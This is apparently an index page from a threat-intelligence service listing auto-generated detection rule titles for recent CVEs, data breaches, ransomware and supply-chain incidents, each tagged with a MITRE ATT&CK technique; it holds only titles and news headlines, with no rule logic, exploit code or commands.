🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — Kali Forms
Breach IntelT1190 — Initial Access
Auto-generated from Kali Forms RCE: WordPress Sites Under Attack
🛡️ 3 more rules via /detect
Monitor Authentication from Breached Vendor — Booking.com
Breach Inteldata-breach — event-type
Auto-generated from Booking.com Suffers Embarrassing Data Leak
🛡️ 1 more rules via /detect
Web Shell Activity Detection — CVE-2026-3017
🌐 NVDT1505.003 — Persistence
Auto-generated from WordPress PHP Object Injection Hits Smart Post Show Plugin
🛡️ 3 more rules via /detect
Web Application Exploitation Attempt — ShowDoc
Breach IntelT1190 — Initial Access
Auto-generated from ShowDoc RCE Flaw CVE-2025-0520 Under Active Exploitation
🛡️ 3 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-40289
🌐 NVDT1190 — Initial Access
Auto-generated from PraisonAI Browser Bridge Critical Session Hijacking
🛡️ 3 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-6264
🌐 NVDT1190 — Initial Access
Auto-generated from Critical RCE in Talend JobServer & Runtime (CVE-2026-6264)
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-4388
🌐 NVDT1190 — Initial Access
Auto-generated from WordPress Form Maker Plugin Hit by Stored XSS
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-4365
🌐 NVDT1190 — Initial Access
Auto-generated from Critical WordPress LearnPress Flaw Allows Unauth Data Del...
🛡️ 3 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-4352
🌐 NVDT1190 — Initial Access
Auto-generated from JetEngine Plugin SQLi Puts WordPress Sites at Risk
🛡️ 3 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-34256
🌐 NVDT1190 — Initial Access
Auto-generated from SAP ERP/S/4HANA Flaw Exposes ABAP Reports to Unauthorized...
🛡️ 3 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-27681
🌐 NVDT1190 — Initial Access
Auto-generated from Critical SQLi Hits SAP Business Planning & BW
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-6224
🌐 NVDT1190 — Initial Access
Auto-generated from Nocobase Plugin Sandbox Bypass: Remote Exploit Publicly A...
🛡️ 3 more rules via /detect
Exploitation Attempt — UniFi Play WiFi Credentials Exposed by A
🌐 NVDvulnerability — event-type
Auto-generated from UniFi Play WiFi Credentials Exposed by Access Control Flaw
Web Application Exploitation Attempt — CVE-2026-22563
🌐 NVDT1190 — Initial Access
Auto-generated from UniFi Play Devices Face Critical Command Injection Vulner...
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-22562
🌐 NVDT1190 — Initial Access
Auto-generated from Critical RCE Found in UniFi Play Devices
🛡️ 3 more rules via /detect
Monitor Authentication from Breached Vendor — Basic-Fit
Breach Inteldata-breach — event-type
Auto-generated from Basic-Fit Breach Exposes 1 Million Members
🛡️ 1 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-33901
🌐 NVDT1190 — Initial Access
Auto-generated from ImageMagick Heap Overflow Vulnerability Exposed
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-32605
🌐 NVDT1190 — Initial Access
Auto-generated from Nimiq Albatross Vulnerability: Validator Crash via Malfor...
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-6200
🌐 NVDT1190 — Initial Access
Auto-generated from Tenda F456 Router Faces High-Severity Stack Buffer Overflow
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-6199
🌐 NVDT1190 — Initial Access
Auto-generated from Tenda F456 Router Hit by Critical Stack-Based Buffer Over...
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-6198
🌐 NVDT1190 — Initial Access
Auto-generated from Tenda F456 Routers Hit by Critical Buffer Overflow
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-6197
🌐 NVDT1190 — Initial Access
Auto-generated from Tenda Router Vulnerability Exposes Networks to Remote Att...
🛡️ 2 more rules via /detect
Web Shell Activity Detection — CVE-2026-40044
🌐 NVDT1505.003 — Initial Access
Auto-generated from Pachno Framework Critical Deserialization Flaw Allows RCE
🛡️ 3 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-40042
🌐 NVDT1190 — Initial Access
Auto-generated from Pachno Suffers Critical XML Injection Vulnerability (CVE-...
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-40040
🌐 NVDT1190 — Initial Access
Auto-generated from Pachno RCE: Unrestricted File Upload Bypasses Filters
🛡️ 3 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-40038
🌐 NVDT1190 — Initial Access
Auto-generated from Pachno 1.0.6 Plagued by Stored XSS
🛡️ 2 more rules via /detect
Exploitation Attempt — United States government
Breach Intelvulnerability — event-type
Auto-generated from CISA Adds Seven New KEVs to Catalog, Mandates Federal Action
Web Application Exploitation Attempt — CVE-2026-6196
🌐 NVDT1190 — Initial Access
Auto-generated from Tenda F456 Routers Hit by Critical Remote Buffer Overflow
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-6195
🌐 NVDT1190 — Initial Access
Auto-generated from Critical RCE Hits Totolink Routers: Patch Your A7100RU Now
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-6194
🌐 NVDT1190 — Initial Access
Auto-generated from Totolink A3002MU B20211125.1046 Router Faces High-Severit...
🛡️ 3 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-32316
🌐 NVDT1190 — Initial Access
Auto-generated from jq Integer Overflow: Heap Buffer Overflow Risks Untrusted...
🛡️ 2 more rules via /detect
Traffic to Compromised Vendor — OpenAI
Breach Intelsupply-chain — event-type
Auto-generated from OpenAI Rotates macOS Certs After Supply Chain Attack on A...
🛡️ 1 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-6193
🌐 NVDT1190 — Initial Access
Auto-generated from PHPGurukul Daily Expense System Hit by SQLi Vulnerability
🛡️ 3 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-6189
🌐 NVDT1190 — Initial Access
Auto-generated from SQL Injection Found in Pharmacy Sales and Inventory System
🛡️ 3 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-6188
🌐 NVDT1190 — Initial Access
Auto-generated from SQL Injection Flaw Found in Pharmacy System: Exploit Avai...
🛡️ 3 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-6187
🌐 NVDT1190 — Initial Access
Auto-generated from SQLi Exploit Public for SourceCodester Pharmacy System
🛡️ 3 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-6186
🌐 NVDT1190 — Initial Access
Auto-generated from UTT HiPER 1200GW Buffer Overflow: Remote Exploit Publicly...
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-6183
🌐 NVDT1190 — Initial Access
Auto-generated from SQLi Exploit Drops for Simple CMS 1.0
🛡️ 3 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-6182
🌐 NVDT1190 — Initial Access
Auto-generated from SQL Injection Found in Simple CMS: Public Exploit Available
🛡️ 3 more rules via /detect
Web Shell Activity Detection — CVE-2026-1462
🌐 NVDT1505.003 — Privilege Escalation
Auto-generated from Keras Vulnerability Lets Attackers Execute Code Via Saved...
🛡️ 4 more rules via /detect
Monitor Authentication from Breached Vendor — Los Angeles Police Department
Breach Inteldata-breach — event-type
Auto-generated from LAPD Data Breach Exposes 7.7 TB from City Attorney's Office
🛡️ 1 more rules via /detect
Ransomware Indicators — Krybit Supply Chain
Breach Intelransomware — event-type
Auto-generated from Ransomware Rumble: 0APT Claims Krybit Ransomware Group as...
🛡️ 1 more rules via /detect
Exploitation Attempt — Adobe
Breach Intelvulnerability — event-type
Auto-generated from Adobe Reader Zero-Day Exploited in the Wild: Patch Urgently
Web Application Exploitation Attempt — CVE-2026-21643
Breach IntelT1190 — Initial Access
Auto-generated from CVE-2026-21643 — Fortinet FortiClient EMS: Fortinet SQL I...
🛡️ 3 more rules via /detect
Web Application Exploitation Attempt — CVE-2023-21529
Breach IntelT1190 — Initial Access
Auto-generated from CVE-2023-21529 — Microsoft Exchange Server: Microsoft Exc...
🛡️ 3 more rules via /detect
Click on Phishing Link from CVE-2020-9715 Domain
Breach IntelT1566.002 — Initial Access
Auto-generated from CVE-2020-9715 — Adobe Acrobat: Adobe Acrobat Use-After-Fr...
Click on Phishing Link from CVE-2012-1854 Domain
Breach IntelT1566.002 — Initial Access
Auto-generated from CVE-2012-1854 — Microsoft Visual Basic for Applications (...
🛡️ 2 more rules via /detect
Monitor Authentication from Breached Vendor — Dubai Courts
Breach Inteldata-breach — event-type
Auto-generated from Handala Claims Breaches at Major UAE Organizations
🛡️ 1 more rules via /detect
Ransomware Indicators — ChipSoft Supply Chain
Breach Intelransomware — event-type
Auto-generated from Ransomware Hits Dutch Software Vendor, Disrupts Hospitals
🛡️ 1 more rules via /detect
Monitor Authentication from Breached Vendor — Rockstar Games
Breach Inteldata-breach — event-type
Auto-generated from Rockstar Games Confirms Breach, ShinyHunters Claims Credit
🛡️ 1 more rules via /detect
Traffic to Compromised Vendor — CPUID
Breach Intelsupply-chain — event-type
Auto-generated from CPUID Watering Hole Attack Spreads STX RAT via Fake Downl...
🛡️ 1 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-6168
🌐 NVDT1190 — Initial Access
Auto-generated from TOTOLINK A7000R Stack Buffer Overflow: Remote Exploit Pub...
🛡️ 3 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-6167
🌐 NVDT1190 — Initial Access
Auto-generated from SQLi Flaw Hits Faculty Management System: Exploit Public
🛡️ 3 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-6166
🌐 NVDT1190 — Initial Access
Auto-generated from SQLi Flaw Hits Vehicle Showroom Management System
🛡️ 3 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-5936
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-5936: High-Severity SSRF Poses Internal Network ...
🛡️ 3 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-40436
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-40436 — The ZTE ZXEDM iEMS product has a passwor...
🛡️ 3 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-6165
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-6165 — Unknown Code Of The File /Util/Login_chec...
🛡️ 3 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-6164
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-6164 — Code-Projects Lost And Found Thing Manage...
🛡️ 3 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-6163
🌐 NVDT1190 — Initial Access
Auto-generated from SQLi Found in Lost and Found Thing Management
🛡️ 3 more rules via /detect
Monitor Authentication from Breached Vendor — Meta
Breach Inteldata-breach — event-type
Auto-generated from Meta Insider Lifts 30K Private Facebook Photos
🛡️ 1 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-6161
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-6161: Simple ChatBox SQLi — High Severity, Publi...
🛡️ 3 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-6158
🌐 NVDT1190 — Initial Access
Auto-generated from Totolink N300RH Router Hit by Remote Command Injection
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-25208
🌐 NVDT1190 — Initial Access
Auto-generated from High-Severity Integer Overflow in Samsung Escargot Poses ...
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-25205
🌐 NVDT1190 — Initial Access
Auto-generated from Samsung Escargot Heap Overflow: A Ticking Time Bomb
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-6157
🌐 NVDT1190 — Initial Access
Auto-generated from Totolink A800R Routers Hit by Remote Buffer Overflow
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-6156
🌐 NVDT1190 — Initial Access
Auto-generated from Critical RCE Hits Totolink Routers: CVE-2026-6156 Explained
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-6155
🌐 NVDT1190 — Initial Access
Auto-generated from Critical RCE Found in Totolink A7100RU Routers
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-6154
🌐 NVDT1190 — Initial Access
Auto-generated from Critical RCE Flaw in Totolink A7100RU Routers Exposed
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-6153
🌐 NVDT1190 — Initial Access
Auto-generated from SQLi Found in Vehicle Showroom Management System
🛡️ 3 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-34856
🌐 NVDT1190 — Initial Access
Auto-generated from UAF Flaw Hits Communication Module, Poses High Availabili...
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-34853
🌐 NVDT1190 — Initial Access
Auto-generated from High-Severity Permission Bypass Hits LBS Module
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-6152
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-6152: SQLi Hits Vehicle Showroom Management System
🛡️ 3 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-6151
🌐 NVDT1190 — Initial Access
Auto-generated from SQLi Found in Vehicle Showroom System (CVE-2026-6151)
🛡️ 3 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-6149
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-6149 — Code-Projects Vehicle Showroom Management...
🛡️ 3 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-6148
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-6148: SQLi Hits Vehicle Showroom Management System
🛡️ 3 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-6142
🌐 NVDT1190 — Initial Access
Auto-generated from SQL Injection Found in Hotel Management System
🛡️ 3 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-6140
🌐 NVDT1190 — Initial Access
Auto-generated from Critical RCE Found in Totolink A7100RU Routers
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-6139
🌐 NVDT1190 — Initial Access
Auto-generated from Critical RCE Found in Totolink A7100RU Routers
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-6138
🌐 NVDT1190 — Initial Access
Auto-generated from Totolink A7100RU Routers Hit by Critical OS Command Injec...
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-6137
🌐 NVDT1190 — Initial Access
Auto-generated from Tenda F451 Router Stack Overflow: Public Exploit Available
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-6136
🌐 NVDT1190 — Initial Access
Auto-generated from High-Severity Buffer Overflow Hits Tenda F451 Routers
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-6135
🌐 NVDT1190 — Initial Access
Auto-generated from Tenda F451 Router Hit by Remote Stack Buffer Overflow
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-6134
🌐 NVDT1190 — Initial Access
Auto-generated from Tenda F451 Router Hit by Remote Buffer Overflow
🛡️ 3 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-6133
🌐 NVDT1190 — Initial Access
Auto-generated from Tenda Router Faces Critical Stack Buffer Overflow
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-6132
🌐 NVDT1190 — Initial Access
Auto-generated from Critical RCE Found in Totolink A7100RU Routers
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-6131
🌐 NVDT1190 — Initial Access
Auto-generated from Critical RCE Flaw Hits Totolink Routers
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-6130
🌐 NVDT1190 — Initial Access
Auto-generated from New Chatbox AI Flaw: Remote OS Command Injection
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-6129
🌐 NVDT1190 — Initial Access
Auto-generated from ChatGPT-on-WeChat Agent Mode Vulnerability Exposes Users
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-40393
🌐 NVDT1190 — Initial Access
Auto-generated from Mesa WebGPU Bug Allows Out-of-Bounds Memory Access
🛡️ 2 more rules via /detect
Exploitation Attempt — Venice
Breach Intelvulnerability — event-type
Auto-generated from Hackers Claim Control Over Venice Anti-Flood System
Web Application Exploitation Attempt — CVE-2019-25709
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2019-25709 — CF Image Hosting Script 1.6.5 allows una...
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2019-25705
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2019-25705 — Buffer Overflow
🛡️ 3 more rules via /detect
Web Application Exploitation Attempt — CVE-2019-25697
🌐 NVDT1190 — Initial Access
Auto-generated from Unauthenticated SQLi Threatens CMSsite 1.0
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2018-25258
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2018-25258 — The GUI Preferences Dialog That Code Exe...
🛡️ 3 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-6124
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-6124 — The Function FromSafeMacFilter Of The Fil...
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-6123
🌐 NVDT1190 — Initial Access
Auto-generated from Tenda F451 Router Hit by Remote Buffer Overflow
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-6121
🌐 NVDT1190 — Initial Access
Auto-generated from Tenda F451 Router Hit with Critical Buffer Overflow
🛡️ 2 more rules via /detect
Exploitation Attempt — Censys
Breach Intelvulnerability — event-type
Auto-generated from Iranian APTs Target Exposed Rockwell PLCs: 5,219 Devices ...
Web Application Exploitation Attempt — CVE-2026-6120
🌐 NVDT1190 — Initial Access
Auto-generated from Tenda F451 Router Hit by Remote Buffer Overflow
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-6116
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-6116 — Totolink A7100RU 7.4cu.2313_b20191024 Com...
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-6115
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-6115 — Totolink A7100RU 7.4cu.2313_b20191024 Com...
🛡️ 2 more rules via /detect
Monitor Authentication from Breached Vendor — Hallmark
Breach Inteldata-breach — event-type
Auto-generated from Hallmark Suffers Alleged Breach, 1.7M Accounts Exposed
🛡️ 1 more rules via /detect
Traffic to Compromised Vendor — Rockstar Games
Breach Intelsupply-chain — event-type
Auto-generated from ShinyHunters Claims Rockstar Games Breach via Snowflake S...
🛡️ 1 more rules via /detect
Exploitation Attempt — Kaspersky
Breach Intelvulnerability — event-type
Auto-generated from AirSnitch: Guest Network Isolation is a Myth
Exploitation Attempt — Marimo
Breach Intelvulnerability — event-type
Auto-generated from Marimo RCE: 10 Hours From Disclosure to Exploitation
Web Application Exploitation Attempt — CVE-2026-34080
Breach IntelT1190 — Initial Access
Auto-generated from xdg-dbus-proxy Flaw Bypasses Eavesdrop Restrictions
🛡️ 3 more rules via /detect
Web Application Exploitation Attempt — WordPress
Breach IntelT1190 — Initial Access
Auto-generated from UsersWP Plugin SSRF Vulnerability Exposes WordPress Sites
🛡️ 2 more rules via /detect
Suspicious JavaScript Execution via WSH
Breach IntelT1059.007 — Execution
Auto-generated from CVE-2026-35534 — ChurchCRM is an open-source church manag...
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-33186
Breach IntelT1190 — Initial Access
Auto-generated from CVE-2026-33186 — gRPC-Go is the Go language implementatio...
🛡️ 2 more rules via /detect
Monitor Authentication from Breached Vendor — Hims & Hers Health, Inc.
Breach Inteldata-breach — event-type
Auto-generated from Hims Breach: PHI Exposed, Privacy Shattered
🛡️ 1 more rules via /detect
Web Shell Activity Detection — CVE-2026-40175
Breach IntelT1505.003 — Initial Access
Auto-generated from CVE-2026-40175 — Axios is a promise based HTTP client for...
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-39922
Breach IntelT1190 — Initial Access
Auto-generated from CVE-2026-39922 — GeoNode versions 4.0 before 4.4.5 and 5....
🛡️ 2 more rules via /detect
Credential Abuse from Breached Vendor — CVE-2026-32252
Breach IntelT1078.004 — Persistence
Auto-generated from CVE-2026-32252 — Chartbrew is an open-source web applicat...
🛡️ 3 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-39349
Breach IntelT1190 — Initial Access
Auto-generated from CVE-2026-39349 — OrangeHRM is a comprehensive human resou...
🛡️ 2 more rules via /detect
Credential Abuse from Breached Vendor — Genealogy
Breach IntelT1078.004 — Persistence
Auto-generated from Genealogy App Suffers Critical Access Control Flaw
🛡️ 1 more rules via /detect
Web Shell Activity Detection — BentoML
Breach IntelT1505.003 — Initial Access
Auto-generated from BentoML Vulnerability Allows Host Code Execution via Mali...
🛡️ 3 more rules via /detect
Ransomware Indicators — Alamo Heights ISD Supply Chain
Breach Intelransomware — event-type
Auto-generated from Alamo Heights ISD Stays Silent on Ransom Payment Post-Mal...
🛡️ 1 more rules via /detect
Exploitation Attempt — Talos Intelligence
Breach Intelvulnerability — event-type
Auto-generated from Patch Window Shrinking: Exploits Accelerate
Click on Phishing Link from iCalendar Domain
Breach IntelT1566.002 — Initial Access
Auto-generated from iCalendar Library Vulnerability: ICS Injection Flaw Uncov...
🛡️ 3 more rules via /detect
Web Application Exploitation Attempt — OpenHands
Breach IntelT1190 — Initial Access
Auto-generated from OpenHands AI Dev Tool Hit with Command Injection Flaw
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — GlobaLeaks
Breach IntelT1190 — Initial Access
Auto-generated from GlobaLeaks Whistleblower Tool Leaks Sensitive Support Emails
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — AFFiNE
Breach IntelT1190 — Initial Access
Auto-generated from AFFiNE Vulnerability: Open Redirect Flaw Patched in v0.26.0
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — Metabase
Breach IntelT1190 — Initial Access
Auto-generated from Metabase Subscription Vulnerability Exposes Self-Hosted I...
🛡️ 4 more rules via /detect
Web Application Exploitation Attempt — ChurchCRM
Breach IntelT1190 — Initial Access
Auto-generated from ChurchCRM Flaw Exposes Users to Cross-Site Scripting Attacks
🛡️ 2 more rules via /detect
Exploitation Attempt — CISA
Breach Intelvulnerability — event-type
Auto-generated from Human-Scale Security Broken: 1 Billion Records Reveal Exp...
Exploitation Attempt — Juniper Networks
Breach Intelvulnerability — event-type
Auto-generated from Juniper Patches Critical Junos OS Vulnerabilities
Exploitation Attempt — Orthanc
Breach Intelvulnerability — event-type
Auto-generated from Orthanc DICOM Flaws Expose Medical Systems to Crashes and...
Web Application Exploitation Attempt — Synology
Breach IntelT1190 — Initial Access
Auto-generated from Synology VPN Client Flaw Exposes User PINs
🛡️ 2 more rules via /detect
Exploitation Attempt — EngageLab
Breach Intelvulnerability — event-type
Auto-generated from EngageLab SDK Bug Exposes 50M Android Users' Private Data
Drive-by Download via Browser — OpenStack
Breach IntelT1189 — Initial Access
Auto-generated from OpenStack Skyline Vulnerable to DOM-Based XSS
Web Application Exploitation Attempt — CVE-2026-22750
Breach IntelT1190 — Initial Access
Auto-generated from CVE-2026-22750 — When configuring SSL bundles in Spring C...
🛡️ 2 more rules via /detect
Exploitation Attempt — GitLab
Breach Intelvulnerability — event-type
Auto-generated from GitLab Patches High-Severity Flaw Alongside 11 Other Vuln...
Traffic to Compromised Vendor — Smart Slider 3 Pro
Breach Intelsupply-chain — event-type
Auto-generated from Backdoored Smart Slider 3 Pro Update Hits WordPress Sites
🛡️ 1 more rules via /detect
Ransomware Indicators — Anderlues Municipal Administration Supply Chain
Breach Intelransomware — event-type
Auto-generated from Belgian Municipality Crippled by Cyberattack, Services Of...
🛡️ 1 more rules via /detect
Web Application Exploitation Attempt — WP-Optimize
Breach IntelT1190 — Initial Access
Auto-generated from WP-Optimize Vulnerability Lets Low-Privilege Users Wreck ...
🛡️ 3 more rules via /detect
Web Application Exploitation Attempt — JetKVM
Breach IntelT1190 — Initial Access
Auto-generated from JetKVM Firmware Flaw: Trusting Updates Blindly is Risky B...
🛡️ 3 more rules via /detect
Web Application Exploitation Attempt — SourceCodester
Breach IntelT1190 — Initial Access
Auto-generated from SQL Injection Flaw Found in Sales and Inventory System
🛡️ 3 more rules via /detect
Web Application Exploitation Attempt — Apache Tomcat
Breach IntelT1190 — Initial Access
Auto-generated from Apache Tomcat Suffers Critical Padding Oracle Vulnerability
🛡️ 3 more rules via /detect
Web Application Exploitation Attempt — Smart Slider 3 Pro
Breach IntelT1190 — Initial Access
Auto-generated from Smart Slider 3 Pro Hit by Sophisticated Multi-Stage Attack
🛡️ 4 more rules via /detect
Traffic to Compromised Vendor — Aqua Security
Breach Intelsupply-chain — event-type
Auto-generated from TeamPCP, LAPSUS Claims: A Supply Chain Mess with Anti-Ira...
🛡️ 1 more rules via /detect
Web Application Exploitation Attempt — Wikimedia Foundation
Breach IntelT1190 — Initial Access
Auto-generated from MediaWiki's ApiSandbox Vulnerable to Cross-Site Scripting
🛡️ 2 more rules via /detect
Monitor Authentication from Breached Vendor — Eurail
Breach Inteldata-breach — event-type
Auto-generated from Eurail Suffers Major Data Breach, 308K Travelers Exposed
🛡️ 1 more rules via /detect
Web Application Exploitation Attempt — CVE-2025-3783
Breach IntelT1190 — Initial Access
Auto-generated from Critical Unrestricted Upload Bug Found in Pharmacy System
🛡️ 3 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-28205
Breach IntelT1190 — Initial Access
Auto-generated from OpenPLC_V3 Flaw Lets Attackers Bypass Auth via API
🛡️ 2 more rules via /detect
Drive-by Download via Browser — CVE-2026-33510
Breach IntelT1189 — Initial Access
Auto-generated from Homarr Dashboard Vulnerable to DOM-Based XSS
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-32620
Breach IntelT1190 — Initial Access
Auto-generated from Discourse Vulnerability Leaks Staff Read Receipts
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-32619
Breach IntelT1190 — Initial Access
Auto-generated from Discourse Polls Flaw: Unauthorized State Changes Possible
🛡️ 3 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-32618
Breach IntelT1190 — Initial Access
Auto-generated from Discourse Vulnerability: Channel Membership Inference Fla...
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-33185
Breach IntelT1190 — Initial Access
Auto-generated from Discourse Vulnerability Allows Network Probing via Email ...
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-33074
Breach IntelT1190 — Initial Access
Auto-generated from Discourse Subscription Flaw Lets Users Grab Higher Tiers
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-32951
Breach IntelT1190 — Initial Access
Auto-generated from Discourse Vulnerability: Draft Topic Titles Exposed
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-35486
Breach IntelT1190 — Initial Access
Auto-generated from AI Chat Interface Vulnerable to Cloud Credential Theft
🛡️ 2 more rules via /detect
Password Store Access Detection
Breach IntelT1555 — Credential Access
Auto-generated from Backstage SSRF Flaw: URL Redirects Expose Internal Systems
🛡️ 3 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-23885
Breach IntelT1190 — Initial Access
Auto-generated from Alchemy CMS RCE: Ruby Eval Flaw Opens Door for Command Ex...
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-24009
Breach IntelT1190 — Initial Access
Auto-generated from Docling Core RCE Bug: PyYAML Dependency a Major Risk
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-5848
Breach IntelT1190 — Initial Access
Auto-generated from Jeecgboot JimuReport Vulnerability Allows Remote Code Inj...
🛡️ 4 more rules via /detect
Credential Abuse from Breached Vendor — CVE-2026-3568
Breach IntelT1078.004 — Privilege Escalation
Auto-generated from WordPress Plugin Flaw Lets Subscribers Gain Admin Privileges
🛡️ 3 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-5832
Breach IntelT1190 — Initial Access
Auto-generated from SSRF Flaw in atototo API Tool Exposes Remote Attack Risk
🛡️ 3 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-5823
Breach IntelT1190 — Initial Access
Auto-generated from SQL Injection Bug Found in Construction Management System
🛡️ 3 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-35554
Breach IntelT1190 — Initial Access
Auto-generated from Kafka Race Condition Flaw Sends Messages to Wrong Topics
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-35216
Breach IntelT1190 — Initial Access
Auto-generated from Budibase Low-Code Platform Suffers Critical RCE Flaw
🛡️ 2 more rules via /detect
Credential Abuse from Breached Vendor — CVE-2026-35214
Breach IntelT1078.004 — Privilege Escalation
Auto-generated from Budibase Low-Code Platform Suffers Critical Path Traversa...
🛡️ 1 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-31818
Breach IntelT1190 — Initial Access
Auto-generated from Budibase SSRF Flaw: Default Config Leaves Open-Source Low...
🛡️ 3 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-32888
Breach IntelT1190 — Initial Access
Auto-generated from SQL Injection Flaw Found in Open Source Point of Sale
🛡️ 3 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-39370
Breach IntelT1190 — Initial Access
Auto-generated from AVideo Platform Hit by SSRF Vulnerability, Leaking Sensit...
🛡️ 3 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-39366
Breach IntelT1190 — Initial Access
Auto-generated from AVideo's PayPal Handler Vulnerable to Transaction Replay ...
🛡️ 3 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-4825
Breach IntelT1190 — Initial Access
